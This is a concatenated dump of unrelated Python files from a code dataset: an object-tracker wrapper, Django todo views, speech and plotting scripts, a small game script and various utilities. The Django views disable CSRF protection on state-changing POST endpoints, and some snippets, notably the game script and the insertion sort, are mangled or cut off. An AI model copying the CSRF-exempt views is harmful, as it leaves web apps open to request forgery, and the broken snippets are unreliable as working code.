dim=1).data[:, 1, :].cpu().numpy()\n\n # delta regression\n anc = np.tile(p.anchor, (batch_sz, 1, 1))\n delta[:, 0, :] = delta[:, 0, :] * anc[:, :, 2] + anc[:, :, 0]\n delta[:, 1, :] = delta[:, 1, :] * anc[:, :, 3] + anc[:, :, 1]\n delta[:, 2, :] = np.exp(delta[:, 2, :]) * anc[:, :, 2]\n delta[:, 3, :] = np.exp(delta[:, 3, :]) *anc[:, :, 3]\n\n # penalizing\n def change(r):\n return np.maximum(r, 1./r)\n\n def sz(w, h):\n pad = (w + h) * 0.5\n sz2 = (w + pad) * (h + pad)\n return np.sqrt(sz2)\n\n def sz_wh(wh):\n pad = (wh[0] + wh[1]) * 0.5\n sz2 = (wh[0] + pad) * (wh[1] + pad)\n return np.sqrt(sz2)\n\n # scale penalty\n s_c = change(sz(delta[:, 2, :], delta[:, 3, :]) / (sz_wh(size)))\n # ratio penalty\n r_c = change((size[0] / size[1]) / (delta[:, 2, :] / delta[:, 3, :]))\n\n penalty = np.exp(-(r_c * s_c - 1.) * p.penalty_k)\n pscore = penalty * score\n pscore = pscore * (1 - p.window_influence) + window * p.window_influence\n\n # mediating\n if self._cfg.modulate:\n pscore, self.score_viz = self.modulate(pscore, self._mem_len_total, out_sz)\n\n # target regression\n best_pscore_id = np.argmax(pscore, axis=1)\n # arange is needed for correct indexing\n target = delta[np.arange(batch_sz), :, best_pscore_id] / scale_z\n target_sz = size / scale_z\n lr = penalty[np.arange(batch_sz), best_pscore_id] *\\\n score[np.arange(batch_sz), best_pscore_id] * p.lr\n\n res_x = target[:, 0] + pos[0]\n res_y = target[:, 1] + pos[1]\n res_w = target_sz[0] * (1 - lr) + target[:, 2] * lr\n res_h = target_sz[1] * (1 - lr) + target[:, 3] * lr\n\n target_pos = np.array([res_x, res_y])\n target_sz = np.array([res_w, res_h])\n best_scores = pscore[np.arange(batch_sz), best_pscore_id]\n\n # determine the currently best template\n best_temp, lt_score = self._get_best_temp(target_pos, target_sz, best_scores)\n return np.squeeze(target_pos[:, best_temp]), np.squeeze(target_sz[:, best_temp]), lt_score\n\nclass THOR_SiamMask(THOR_Wrapper):\n def __init__(self, cfg, net):\n super(THOR_SiamMask, self).__init__(cfg, net)\n self.template_sz = 127\n self.kernel_sz = 7\n\n def _get_crop(self, im, pos, sz):\n wc_z = sz[0] + self._cfg.context_temp * sum(sz)\n hc_z = sz[1] + self._cfg.context_temp * sum(sz)\n context_size = round(np.sqrt(wc_z * hc_z))\n\n crop = get_subwindow_tracking_SiamRPN(im=im, pos=pos, model_sz=self.template_sz,\n original_sz=context_size,\n avg_chans=self.avg_chans)\n return crop.unsqueeze(0)\n\n def _make_template(self, crop):\n temp = {}\n temp['raw'] = crop.to(self.device)\n temp['im'] = torch_to_img(crop)\n temp['kernel'] = self._net.template(temp['raw'])\n\n # add the tukey window to the temp for comparison\n alpha = self._cfg.tukey_alpha\n win = np.outer(tukey(self.kernel_sz, alpha), tukey(self.kernel_sz, alpha))\n temp['compare'] = temp['kernel'] * torch.Tensor(win).to(self.device)\n return temp\n\n def custom_forward(self, x):\n self._net.zf = torch.cat(list(self.st_module.templates['kernel']) + \\\n list(self.lt_module.templates['kernel']))\n pred_cls, pred_loc, _ = self._net.track_mask(x)\n return pred_loc, pred_cls\n\n def batch_evaluate(self, crop, pos, size, window, scale_x, p):\n \"\"\"\n adapted from SiamRPNs tracker_evaluate\n \"\"\"\n delta, score = self.custom_forward(crop)\n\n out_sz = score.shape[-2:]\n batch_sz = self._mem_len_total\n\n delta = delta.contiguous().view(batch_sz, 4, -1).data.cpu().numpy()\n score = F.softmax(score.contiguous().view(batch_sz, 2, -1), dim=1).data[:, 1, :].cpu().numpy()\n\n # delta regression\n anc = np.tile(p.anchor, (batch_sz, 1, 1))\n delta[:, 0, :] = 
delta[:, 0, :] * anc[:, :, 2] + anc[:, :, 0]\n delta[:, 1, :] = delta[:, 1, :] * anc[:, :, 3] + anc[:, :, 1]\n delta[:, 2, :] = np.exp(delta[:, 2, :]) * anc[:, :, 2]\n delta[:, 3, :] = np.exp(delta[:, 3, :]) *anc[:, :, 3]\n\n # penalizing\n def change(r):\n return np.maximum(r, 1./r)\n\n def sz(w, h):\n pad = (w + h) * 0.5\n sz2 = (w + pad) * (h + pad)\n return np.sqrt(sz2)\n\n def sz_wh(wh):\n pad = (wh[0] + wh[1]) * 0.5\n sz2 = (wh[0] + pad) * (wh[1] + pad)\n return np.sqrt(sz2)\n\n # scale penalty\n target_sz_in_crop = size*scale_x\n s_c = change(sz(delta[:, 2, :], delta[:, 3, :]) / (sz_wh(target_sz_in_crop)))\n # ratio penalty\n r_c = change((size[0] / size[1]) / (delta[:, 2, :] / delta[:, 3, :]))\n\n penalty = np.exp(-(r_c * s_c - 1.) * p.penalty_k)\n pscore = penalty * score\n pscore = pscore * (1 - p.window_influence) + window * p.window_influence\n\n # mediating\n if self._cfg.modulate:\n pscore, self.score_viz = self.modulate(pscore, self._mem_len_total, out_sz)\n\n # target regression\n best_pscore_id = np.argmax(pscore, axis=1)\n # arange is needed for correct indexing\n target = (delta[np.arange(batch_sz), :, best_pscore_id] / scale_x)\n lr = penalty[np.arange(batch_sz), best_pscore_id] *\\\n score[np.arange(batch_sz), best_pscore_id] * p.lr\n target, lr = target.astype(np.float64), lr.astype(np.float64)\n\n res_x = target[:, 0] + pos[0]\n res_y = target[:, 1] + pos[1]\n res_w = size[0] * (1 - lr) + target[:, 2] * lr\n res_h = size[1] * (1 - lr) + target[:, 3] * lr\n\n target_pos = np.array([res_x, res_y])\n target_sz = np.array([res_w, res_h])\n best_scores = pscore[np.arange(batch_sz), best_pscore_id]\n\n # determine the currently best template\n best_temp, lt_score = self._get_best_temp(target_pos, target_sz, best_scores)\n self._net.best_temp = best_temp\n\n return np.squeeze(target_pos[:, best_temp]), np.squeeze(target_sz[:, best_temp]), \\\n lt_score, best_pscore_id[best_temp]\n","sub_path":"trackers/THOR_modules/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":20984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"243077808","text":"\n\nfrom ..utils import Object\n\n\nclass NotificationTypeNewPushMessage(Object):\n \"\"\"\n New message was received through a push notification\n\n Attributes:\n ID (:obj:`str`): ``NotificationTypeNewPushMessage``\n\n Args:\n message_id (:obj:`int`):\n The message identifierThe message will not be available in the chat history, but the ID can be used in viewMessages and as reply_to_message_id\n sender_user_id (:obj:`int`):\n Sender of the messageCorresponding user may be inaccessible \n content (:class:`telegram.api.types.PushMessageContent`):\n Push message content\n\n Returns:\n NotificationType\n\n Raises:\n :class:`telegram.Error`\n \"\"\"\n ID = \"notificationTypeNewPushMessage\"\n\n def __init__(self, message_id, sender_user_id, content, **kwargs):\n \n self.message_id = message_id # int\n self.sender_user_id = sender_user_id # int\n self.content = content # PushMessageContent\n\n @staticmethod\n def read(q: dict, *args) -> \"NotificationTypeNewPushMessage\":\n message_id = q.get('message_id')\n sender_user_id = q.get('sender_user_id')\n content = Object.read(q.get('content'))\n return NotificationTypeNewPushMessage(message_id, sender_user_id, 
content)\n","sub_path":"pytglib/api/types/notification_type_new_push_message.py","file_name":"notification_type_new_push_message.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"562285231","text":"from django.http import HttpResponseNotAllowed\nfrom django.shortcuts import render, redirect\nfrom appTodolist.models import Task\nfrom django.views.decorators.csrf import csrf_exempt\n\n\ndef get_tasks(request):\n    if request.method == 'GET':\n        tasks = Task.objects.all()\n        return render(request, 'appTodoList/tasks.html', {\n            'tasks': tasks\n        })\n    else:\n        return HttpResponseNotAllowed(['GET'])\n\n\n@csrf_exempt\ndef add_task(request):\n    if request.method == 'POST':\n        if request.POST.get('name'):\n            task = Task(name=request.POST.get('name'))\n            task.save()\n        return redirect('tasks:get_tasks')\n    else:\n        return HttpResponseNotAllowed(['POST'])\n\n\n@csrf_exempt\ndef set_done_task(request):\n    if request.method == 'POST':\n        task_id = request.POST.get(\"id\")\n        if task_id is not None:\n            task = Task.objects.get(pk=int(task_id))\n            task.complete()\n            task.save()\n        return redirect('tasks:get_tasks')\n    else:\n        return HttpResponseNotAllowed(['POST'])","sub_path":"appTodolist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"631272685","text":"from web_crawler import WebExecute\nimport sys\nimport sunback as sb\n\n\n# # Main Command Structure\ndef start(params):\n    \"\"\"Select whether to run or to debug\"\"\"\n    __print_header(params)\n    \n    if params.is_debug():\n        __debug_mode(params)\n    else:\n        __run_mode(params)\n\n\ndef __print_header(params):\n    print(\"\\nSunback: Live SDO Background Updater \\nWritten by Chris R. Gilly\")\n    print(\"Check out my website: http://gilly.space\\n\")\n    print(\"Delay: {} Seconds\".format(params.background_update_delay_seconds))\n    # print(\"Coronagraph Mode: {} \\n\".format(params.mode()))\n    \n    if params.is_debug():\n        print(\"DEBUG MODE\\n\")\n\n\ndef __debug_mode(params):\n    \"\"\"Run the program in a way that will break\"\"\"\n    while True:\n        __execute_switch(params)\n\n\ndef __run_mode(params):\n    \"\"\"Run the program in a way that won't break\"\"\"\n    \n    fail_count = 0\n    fail_max = 10\n    \n    while True:\n        try:\n            __execute_switch(params)\n        except (KeyboardInterrupt, SystemExit):\n            print(\"\\n\\nOk, I'll Stop. Doot!\\n\")\n            break\n        except Exception as error:\n            fail_count += 1\n            if fail_count < fail_max:\n                print(\"I failed, but I'm ignoring it. 
Count: {}/{}\\n\\n\".format(fail_count, fail_max))\n print(error)\n continue\n else:\n print(\"Too Many Failures, I Quit!\")\n sys.exit(1)\n\n\ndef __execute_switch(params):\n \"\"\"Select which data source to draw from\"\"\"\n theSun = sb.Sunback(params)\n if params.run_type().casefold() == \"web\".casefold():\n WebExecute(params).execute()\n elif params.run_type().casefold() == \"mr\".casefold():\n theSun.mr_execute()\n elif params.run_type().casefold() == \"jp\".casefold():\n theSun.jp_execute()\n elif params.run_type().casefold() == \"fido\".casefold():\n theSun.fido_execute()\n","sub_path":"sunback/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"640897373","text":"char={\"Name\": \"Light\",\n\"Age\": 17,\n\"Strength\": 8,\n\"Defense\": 10,\n\"HP\": 100,\n\"Backpack\": [\"Shield\", \"Bread\", \"Loaf\"],\n\"Gold\": 100,\n\"Level\": 2}\n\nchar[\"Gold\"]+=50\nchar[\"Backpack\"].append(\"Flintstone\")\nchar[\"pocket\"]= [\"monster\", \"fly\"]\nfor k,v in char.items():\n print(k,v)\n\nskill=[\n{\"Name\": \"Tackle\",\n\"Minimum level\": 2,\n\"Damage\": 5,\n\"Hit rate\": 30,},\n{\"Name\": \"Quick Attack\",\n\"Minimum level\": 5,\n\"Damage\": 3,\n\"Hit rate\": 50}]\n\nfor i in range(len(skill)):\n print(i+1, \".\", skill[i][\"Name\"])\n\nn=input(\"skill? \")\n#x=int(input(\"level? \"))\nimport random \nm= (random.randint(0,70))\n\nif n==skill[0][\"Name\"].lower() or n==skill[0][\"Name\"].upper():\n if char[\"Level\"]>=skill[0][\"Minimum level\"]:\n print(\"damage:\", 3)\n if m>30:\n print(\"truot roi\")\n else:\n print(\"oh ye\")\n elif char[\"Level\"]=skill[1][\"Minimum level\"]:\n print(\"damage:\", 3)\n if m>50:\n print(\"truot roi\")\n else:\n print(\"oh ye\")\n elif char[\"Level\"] current_number:\n list[j], list[i] = list[i], list[j]\n\n return list\n\n\nif __name__ == '__main__':\n assert insertion_sort([5, 3, 4, 7, 2, 8, 6, 9, 1]) == [1, 2, 3, 4, 5, 6, 7, 8, 9]\n # insertion_sort([27, 10, 12, 20, 25, 13, 15, 22])\n","sub_path":"insertion_sort.py","file_name":"insertion_sort.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"642362965","text":"#!/usr/bin/python\nimport matplotlib.pyplot as plt\nimport numpy as np\n# import matplotlib.lines as mlines\nimport matplotlib.ticker\nfrom matplotlib.ticker import FormatStrFormatter\nimport argparse\nimport matplotlib.gridspec as gridspec\nfrom plot.plotting_utilities import *\nfrom matplotlib import colors\nfrom cycler import cycler\nimport sys\nimport yaml\nimport re\nimport os\n\nthis_directory = os.path.dirname(os.path.realpath(__file__)) + \"/\"\n\n\nparser = argparse.ArgumentParser(\n description='Plot the collected stats into a grid of subplots with one line ' +\n 'per app.',\n usage='{} infile -o outfile'.format(sys.argv[0]))\n\nparser.add_argument('-i', '--infile', action='store', type=str,\n help='The input file that contains the data to plot.')\n\nparser.add_argument('-o', '--outdir', action='store', type=str,\n default='./', help='The directory to store the plots.')\n\nparser.add_argument('-y', '--yamlfile', type=str,\n default=this_directory+'plot_config.yml',\n help='The yaml config file.')\n\nparser.add_argument('-s', '--show', action='store_true',\n help='Show the plots or save only.')\n\nif __name__ == '__main__':\n # read cmd line options\n args = parser.parse_args()\n\n args.outdir = 
'{}/{}/'.format(args.outdir,\n args.infile.split('stats-')[1].split('.csv')[0])\n if not os.path.exists(args.outdir):\n os.makedirs(args.outdir)\n\n # read yaml config file\n yc = yaml.load(open(args.yamlfile, 'r'))\n locyc = yc[sys.argv[0].split('/')[-1]]\n globyc = yc['global']\n\n # read input file to datadir\n datadir = {}\n data = np.genfromtxt(args.infile, delimiter='\\t', dtype=str)\n header, data = data[0], data[1:]\n datadir = data_to_dir(header, data, ['metric', 'app_and_args', 'config'],\n keep_only=['num_kernels', 'valuelist'])\n\n # generate the figdir, groups input data, ready to be plotted\n figdir = {}\n bench_suite = ''\n for metric in datadir.keys():\n if metric not in locyc['stats_to_plot']:\n continue\n if metric not in figdir:\n figdir[metric] = {}\n for app in datadir[metric].keys():\n if 'sdk-4.1.15' in app:\n bench_suite = 'sdk'\n elif 'ispass2009-1.0' in app:\n bench_suite = 'ispass'\n elif 'rodinia-2.0-ft' in app:\n bench_suite = 'rodinia'\n elif 'parboil-0.2' in app:\n bench_suite = 'parboil'\n else:\n print('Benchmark suite {} not recognized.')\n exit(-1)\n for conf in datadir[metric][app].keys():\n matches = re.compile('([a-z]+)([0-9]*:?[0-9]*)').findall(conf)\n if not matches:\n continue\n knob = ','.join([m[0] for m in matches])\n if knob not in locyc['knobs_to_plot']:\n continue\n if knob not in figdir[metric]:\n figdir[metric][knob] = {}\n if app not in figdir[metric][knob]:\n figdir[metric][knob][app] = {'x': [], 'y': []}\n\n # Only using the first knob\n x = float(matches[0][1].split(':')[0])\n y = float(datadir[metric][app][conf][1])\n if not np.isnan(y):\n figdir[metric][knob][app]['x'].append(x)\n figdir[metric][knob][app]['y'].append(y)\n\n # iterate over the figdir and plot\n for metric in figdir.keys():\n for knob in figdir[metric].keys():\n # Only using the first knob\n knob1 = knob.split(',')[0]\n outdir = args.outdir + '/' + globyc['knobs'][knob1]\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n rows = locyc[bench_suite]['grid']['rows']\n cols = locyc[bench_suite]['grid']['columns']\n figsize = (2. 
* cols, 2.*rows)\n fig = plt.figure(figsize=figsize)\n fig.suptitle('Knob:{}, Stat:{}'.format(globyc['knobs'][knob1],\n globyc['stat_shorts'][metric]))\n outfile = '{}/{}-{}.jpeg'.format(outdir,\n globyc['stat_shorts'][metric],\n globyc['knobs'][knob1])\n gs = gridspec.GridSpec(rows, cols)\n idx = 0\n yavg_l = []\n for app in figdir[metric][knob].keys():\n x = np.array(figdir[metric][knob][app]['x'])\n y = np.array(figdir[metric][knob][app]['y'])\n\n app = app.split('/')[0]\n indices = [i[0]\n for i in sorted(enumerate(x), key=lambda a:a[1])]\n x, y = x[indices], y[indices]\n # ax.set_title(app)\n ax = plt.subplot(gs[idx//cols, idx % cols])\n # if idx%cols == 0:\n # ax.set_ylabel(metric)\n # if idx//cols == rows-1:\n # ax.set_xlabel(knob)\n if len(y) == 0:\n print('Empty values for {}:{}:{}'.format(metric, knob, app))\n continue\n y = y / y[0]\n yavg_l.append((x, y))\n ax.plot(x, y, label=globyc['bench_shorts']\n [app], marker=locyc['marker'])\n ax.legend(**locyc['legend'])\n ax.yaxis.set_major_locator(matplotlib.ticker.MaxNLocator(\n nbins=locyc['nticks']['y'], integer=True))\n ax.xaxis.set_major_locator(matplotlib.ticker.MaxNLocator(\n nbins=locyc['nticks']['x'], integer=True))\n ax.yaxis.set_major_formatter(FormatStrFormatter('%.3f'))\n plt.xticks(**locyc['ticks']['x'])\n plt.yticks(**locyc['ticks']['y'])\n # ax.ticklabel_format(axis='y', style='sci', scilimits=(0,0))\n # ax2.yaxis.set_major_locator(matplotlib.ticker.LinearLocator(nticks))\n idx += 1\n # Plot the average\n x = set()\n for d in yavg_l:\n x |= set(d[0])\n x = list(x)\n y = np.zeros(len(x))\n ynum = np.zeros(len(x))\n for d in yavg_l:\n for i in range(len(d[0])):\n y[x.index(d[0][i])] += d[1][i]\n ynum[x.index(d[0][i])] += 1\n y /= ynum\n ax = plt.subplot(gs[idx//cols, idx % cols])\n ax.plot(x, y, label=globyc['bench_shorts']\n ['average'], marker=locyc['marker'])\n ax.legend(**locyc['legend'])\n ax.yaxis.set_major_locator(matplotlib.ticker.MaxNLocator(\n nbins=locyc['nticks']['y'], integer=True))\n ax.xaxis.set_major_locator(matplotlib.ticker.MaxNLocator(\n nbins=locyc['nticks']['x'], integer=True))\n ax.yaxis.set_major_formatter(FormatStrFormatter('%.3f'))\n plt.xticks(**locyc['ticks']['x'])\n plt.yticks(**locyc['ticks']['y'])\n # end plot the average\n\n plt.tight_layout()\n plt.subplots_adjust(wspace=0.3, hspace=0.15, top=0.95)\n save_and_crop(fig, outfile, dpi=600, bbox_inches='tight')\n if args.show:\n plt.show()\n plt.close()\n\n # plt.legend(loc='best', fancybox=True, fontsize='11')\n # plt.axvline(700.0, color='k', linestyle='--', linewidth=1.5)\n # plt.axvline(1350.0, color='k', linestyle='--', linewidth=1.5)\n # plt.annotate('Light\\nCombine\\nWorkload', xy=(\n # 200, 6.3), textcoords='data', size='16')\n # plt.annotate('Moderate\\nCombine\\nWorkload', xy=(\n # 800, 6.3), textcoords='data', size='16')\n # plt.annotate('Heavy\\nCombine\\nWorkload', xy=(\n # 1400, 8.2), textcoords='data', size='16')\n","sub_path":"util/job_launching/plotscripts/subplots_one_line_per_bench.py","file_name":"subplots_one_line_per_bench.py","file_ext":"py","file_size_in_byte":7949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"4549121","text":"import time\nfrom functools import wraps\ndef logtime(fun):\n \n @wraps(fun)\n def wrapper(*args, **kwargs):\n start_time = time.time()\n result = fun(*args, **kwargs)\n total_time = time.time() - start_time\n with open('timelog.txt', 'a') as outfile:\n outfile.write(f'{time.time()} \\t {fun.__name__} \\t {total_time} \\n')\n return 
result\n\n return wrapper\n\n\n@logtime\ndef print_args(a1, a2):\n print(a1, a2)\n\n@logtime\ndef sum_args(a1, a2):\n return a1 + a2\n\n\nprint_args('x1', 'x2')\n\nsum_args(2, 3)\n\n\n","sub_path":"decorators_with_functools.py","file_name":"decorators_with_functools.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"220672679","text":"# -*- coding: utf-8 -*-\nimport copy\nimport logging\nimport os\nimport socket\nfrom threading import Thread\n\nimport speech_recognition as sr\nfrom yandex_speech import TTS\n\n\nclass Recognizer:\n\n def __init__(self, **kwargs):\n\n self.logger = kwargs.get('logger', logging.getLogger(__name__))\n\n if kwargs.get('list_mics'):\n print(''.join(['{} {}\\n'.format(i, name) for i, name in enumerate(sr.Microphone.list_microphone_names())]))\n\n exit(0)\n\n self.rec = sr.Recognizer()\n self.rec.phrase_threshold = 0.1\n\n self.mic = sr.Microphone(device_index=kwargs.get('device_index'),\n sample_rate=kwargs.get('sample_rate'),\n chunk_size=kwargs.get('chunk_size') or 1024)\n\n adjust_mic_device_index = kwargs.get('adjust_device_index')\n\n if adjust_mic_device_index:\n self.adjust_mic = sr.Microphone(device_index=adjust_mic_device_index,\n sample_rate=kwargs.get('sample_rate'),\n chunk_size=kwargs.get('chunk_size') or 1024)\n else:\n self.adjust_mic = self.mic\n\n self.rec.operation_timeout = kwargs.get('operation_timeout')\n\n self.listen_timeout = kwargs.get('listen_timeout')\n self.phrase_time_limit = kwargs.get('phrase_time_limit')\n\n self.error_limit = kwargs.get('error_limit')\n self.error_count = self.error_limit + 1\n\n def adjust_recognizer(self, source=None):\n\n self.logger.info('adjusting microphone...')\n\n if source:\n self.rec.adjust_for_ambient_noise(source)\n else:\n with self.adjust_mic as source:\n self.rec.adjust_for_ambient_noise(source)\n\n self.logger.info('adjusting microphone done: {}'\n .format(self.rec.energy_threshold))\n\n def listen(self):\n\n with self.mic as source:\n\n if self.adjust_mic != self.mic:\n Thread(target=self.adjust_recognizer).start()\n\n else:\n if self.error_limit and self.error_count > self.error_limit:\n self.adjust_recognizer(source)\n self.error_count = 0\n\n try:\n self.logger.info('listening...')\n\n return self.rec.listen(source=source,\n timeout=self.listen_timeout,\n phrase_time_limit=self.phrase_time_limit)\n except sr.WaitTimeoutError:\n\n self.error_count += 1\n self.logger.warning('waiting timeout ({} sec) expired'.format(self.listen_timeout))\n\n def recognize(self, audio_data, language):\n\n self.logger.info('sending data for recognition...')\n\n try:\n return self.rec.recognize_google(audio_data=audio_data,\n language=language)\n\n except sr.UnknownValueError:\n\n self.logger.warning('recognition failed')\n self.error_count += 1\n\n except (sr.RequestError, socket.timeout) as e:\n\n self.logger.error('request error: {}'.format(e))\n\n\nclass Player:\n\n @staticmethod\n def play_file(filename):\n\n name, extention = os.path.splitext(filename)\n\n if extention == '.wav':\n Player.play_wav(filename)\n else:\n raise Exception('Unknown file format!')\n\n @staticmethod\n def play_wav(filename):\n chunk = 1024\n\n import wave\n wf = wave.open(filename, 'rb')\n\n import pyaudio\n p = pyaudio.PyAudio()\n stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),\n channels=wf.getnchannels(),\n rate=wf.getframerate(),\n output=True)\n\n data = wf.readframes(chunk)\n\n while len(data) > 0:\n 
stream.write(data)\n data = wf.readframes(chunk)\n\n stream.stop_stream()\n stream.close()\n\n p.terminate()\n\n\nclass YandexTTS:\n\n def __init__(self, **kwargs):\n\n self.logger = kwargs.get('logger', logging.getLogger(__name__))\n self.yandex_tts = TTS(speaker=kwargs.get('speaker', 'jane'),\n audio_format='wav',\n emotion=kwargs.get('emotion'),\n key=kwargs['key'])\n\n def save_to_file(self, text, filename):\n\n yandex_tts = copy.copy(self.yandex_tts)\n yandex_tts.generate(text)\n yandex_tts.save(filename)\n\n self.logger.info('saved speech to file {}'.format(filename))\n","sub_path":"nodes/speech.py","file_name":"speech.py","file_ext":"py","file_size_in_byte":4646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"133340163","text":"from pathlib import Path\n\n\nhome = Path.home()\nassets: Path = Path(__file__).parent / 'assets'\n\nMAIN_MUSIC = assets / 'Sappheiros - Lights.mp3'\nDEFAULT_VOLUME = .25\nSCREEN_WIDTH = 1000\nSCREEN_HEIGHT = 1000\nSCREEN_TITLE = \"Fishy\"\nCHARACTER_SCALING = 1\nTILE_SCALING = 0.5\nCOIN_SCALING = 0.5\nPLAYER_MOVEMENT_SPEED = 5","sub_path":"final_project/fishy/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"426859412","text":"from textblob import TextBlob\nfrom vader_sentiment.vader_sentiment import SentimentIntensityAnalyzer\n\n\ndef get_sentiment(sentence):\n sentence = str(sentence)\n blob = TextBlob(sentence)\n return blob.sentiment\n\n\ndef get_sentiment_vader(sentence):\n if sentence is None or sentence == \"\":\n vs = {\"pos\": 0, \"neg\": 0, \"neu\": 0}\n else:\n analyzer = SentimentIntensityAnalyzer()\n vs = analyzer.polarity_scores(sentence)\n return vs","sub_path":"backend/text_functions.py","file_name":"text_functions.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"137671116","text":"EOL = \"\\n\"\n\nclass Scenario:\n\n def __init__ (self, nom_scenario, nom_simulateur, log_std, log_nam):\n\n #\n # Opening of the various files\n #\n\n # TCL file containing the scenario\n self.fichier_scenario = open(nom_scenario, \"w\", encoding=\"utf8\")\n\n # Std log file\n self.fichier_log_std = open(log_std, \"w\", encoding=\"utf8\")\n\n # Nam log file\n self.fichier_log_nam = open(log_nam, \"w\", encoding=\"utf8\")\n\n\n # The simulator\n self.simulateur = nom_simulateur\n\n\n #\n # Initialization of the TCL file\n #\n self.fichier_scenario.write(\"set \" + self.simulateur + \" [new Simulator]\" + EOL);\n\n\n\n def finir (self):\n\n #\n # Closing of the files\n #\n\n # Scenario\n self.fichier_scenario.close();\n\n # Log std\n self.fichier_log_std.close();\n\n # Log nam\n self.fichier_log_nam.close();\n","sub_path":"EvaluationDePerformances/TP/TP2/ScenarioBuilder.py","file_name":"ScenarioBuilder.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"602697633","text":"# from steam.models import Details, Images\n\n#\n# def getDetailsModelFromJson(details_json, appid):\n# details = details_json['details'][appid]\n# success = details['success']\n# if success:\n# data = details['data']\n# game_details = Details()\n#\n# game_details.game_type = data['type']\n# game_details.name = data['name']\n# game_details.required_age = data['required_age']\n# 
game_details.about_the_game = data['about_the_game']\n# game_details.short_description = data['short_description']\n# game_details.supported_languages = data['supported_languages']\n# game_details.developers = data['developers']\n# game_details.publishers = data['publishers']\n# game_details.platforms = data['platforms']\n# game_details.release_date = data['release_date']['date']\n# game_details.coming_soon = data['release_date']['coming_soon']\n#\n# images = Images(\n# data['header_image'],\n# data['screenshots'],\n# data['background']\n# )\n#\n# game_details.images = images\n#\n# return data\n# return None\n\n# Check if the app has details\ndef isValidDetails(details_json, appid):\n return details_json[appid]['success']\n\n# Scale data to the SteamSpy and SteamAPI are on one line\ndef get_scaled_data(values):\n total = sum(values.values())\n max_length = 108081\n fracs_labels = {}\n for k, v in values.items():\n frac = ((100 / total) * v) / 100\n fracs_labels[k] = frac * 100\n new_amount = int(max_length * frac)\n values[k] = new_amount\n\n return values, fracs_labels\n","sub_path":"steam/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"43194827","text":"\"\"\"\n\nCode Challenge\n Name: \n Regular Expression 2\n Filename: \n regex2.py\n Problem Statement:\n You are given N email addresses. \n Your task is to print a list containing only valid email addresses in alphabetical order.\n Valid email addresses must follow these rules:\n\n It must have the username@websitename.extension format type.\n The username can only contain letters, digits, dashes and underscores.\n The website name can only have letters and digits.\n The minimum length is 2 and maximum length of the extension is 4. 
\n Hint: \n Using Regular Expression \n Input:\n lara@hackerrank.com\n brian-23@hackerrank.com\n britts_54@hackerrank.com\n Output:\n ['brian-23@hackerrank.com', 'britts_54@hackerrank.com', 'lara@hackerrank.com']\n\n\"\"\"\nimport re\n\nfile = open(\"mail.txt\",\"r\")\n\nmails =re.compile(\"[a-z0-9-_]+@[a-z0-9]+.{2,4}\")\nlist1 =[]\n\nfor item in file:\n data = mails.findall(item)\n \n if not data:\n continue\n else:\n list1.append(data[0])\nlist1.sort()\nprint(list1)\n\nfile.close()\n\n\n\n\n\n","sub_path":"day5/regex2.py","file_name":"regex2.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"653481411","text":"import logging\nfrom inspect import getfullargspec\nfrom functools import wraps\n\nlogger = logging.getLogger(__name__)\n\n\ndef permit_superuser(user_field_name=\"user\"): #Decorator\n def decorator(func):\n argspec = getfullargspec(func)\n user_index = argspec.args.index(user_field_name) \n @wraps(func)\n def add_superuser_check(*args,**kwargs):\n try:\n user=args[user_index]\n except IndexError:\n user=kwargs[user_field_name]\n return user.is_superuser or func(*args, **kwargs) \n return add_superuser_check\n return decorator\n\n@permit_superuser()\ndef is_owner(user, batch):\n return user == batch.user","sub_path":"dear_petition/petition/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"479764475","text":"#!/usr/bin/env python\n# vim: ts=2:sw=2:tw=80:nowrap\n# -*- coding: utf-8 -*-\n\"\"\"\nRemote device interface for the BeagleBone Black using AFRL firmware/hardware.\n\"\"\"\n\nimport sys\nfrom os.path import join as path_join, dirname, pardir\n\nimport Pyro4\n\nimport bbb\nfrom logging import debug\n\nfrom ......version import version as arbwave_version\nfrom .bbb_pyro import format_objectId\n\nBBB_VERSION = 'bbb-0.4.0'\n\n\n\nclass Device(object):\n \"\"\"\n The Logical Device for a single instance of the BeagleBone Black using AFRL\n firmware/hardware.\n \"\"\"\n\n def __init__(self, hostid, type):\n super(Device,self).__init__()\n self.hostid = hostid\n self.objectId = format_objectId(hostid, type)\n self._owner = None\n\n assert bbb.version.compatible(bbb.VERSION, BBB_VERSION), \\\n 'AFRL/BeagleBone Black version is incompatible'\n\n def __repr__(self):\n return self.objectId\n\n def 